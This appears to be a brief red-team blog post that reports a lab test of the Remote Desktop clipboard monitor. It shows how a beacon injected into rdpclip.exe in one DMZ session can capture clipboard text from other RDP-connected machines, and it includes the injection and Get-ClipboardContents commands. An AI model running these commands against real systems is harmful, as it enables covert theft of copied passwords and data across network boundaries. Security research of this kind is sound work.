This is just a quick post to demonstrate some interesting aspects of the Remote Desktop Clipboard Monitor.

Vincent Yiu already published details of a great attack called RDPInception, which allows an adversary to “swim” back up an RDP session if drive sharing is enabled. Drive sharing is not enabled by default but clipboard monitoring is, making it particularly potent and prevelant.

I set up a little lab to test to what extent clipboard contents are exposed.

The idea is that both DMZ1 and DMZ2 are only accessed via an RDP “Jump Box” on the main LAN. Based on my experience, it’s very common for sysadmins to manage these “segregated” networks from production environments via RDP.

The Get-ClipboardContents module from Empire allows you to capture the clipboard of a user. If an admin RDP’s into DMZ2 from the LAN, we can inject this capability into one of their processes and see what they’re copying/pasting within DMZ2.

But as it happens, the scope of what we can read is not limited to DMZ2.

We can guess that someone is using RDP based on an established incoming connection on port 3389, and a process synonymous with RDP: rdpclip.exe.

TCP    192.168.2.200:3389     192.168.0.200:63340    ESTABLISHED

PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
1084  680   ShellExperienceHost.exe      x64   3           DMZ2\rasta
2248  1096  explorer.exe                 x64   3           DMZ2\rasta
3280  680   SearchUI.exe                 x64   3           DMZ2\rasta
3332  680   RuntimeBroker.exe            x64   3           DMZ2\rasta
3652  1232  sihost.exe                   x64   3           DMZ2\rasta
3668  584   svchost.exe                  x64   3           DMZ2\rasta
3836  1232  taskhostw.exe                x64   3           DMZ2\rasta
3924  888   rdpclip.exe                  x64   3           DMZ2\rasta
4368  680   dllhost.exe                  x64   3           DMZ2\rasta

Inject a beacon into rdpclip, then import and run Get-ClipboardContents.

beacon> inject 3924 x64 smb
beacon> powershell-import D:\Tools\Get-ClipboardContents.ps1
beacon> powershell Get-ClipboardContents -PollInterval 1

I was first able to verify that I could capture the clipboard from inside the DMZ2 RDP session.

[+] received output:
=== 09/06/2018:13:12:26:91 ===

hello from dmz2

Now it started getting interesting… When RDP’d into DMZ1 from the LAN whilst still connected to DMZ2, it turns out we can capture the DMZ1 clipboard from within DMZ2.

[+] received output:
=== 09/06/2018:13:19:11:09 ===

hello from dmz1

Not only that, but also from both the Jump Box and the source workstation on the LAN.

[+] received output:
=== 09/06/2018:13:20:40:50 ===

hello from the lan jump box

[+] received output:
=== 09/06/2018:13:21:34:25 ===

and hello from the lan workstation!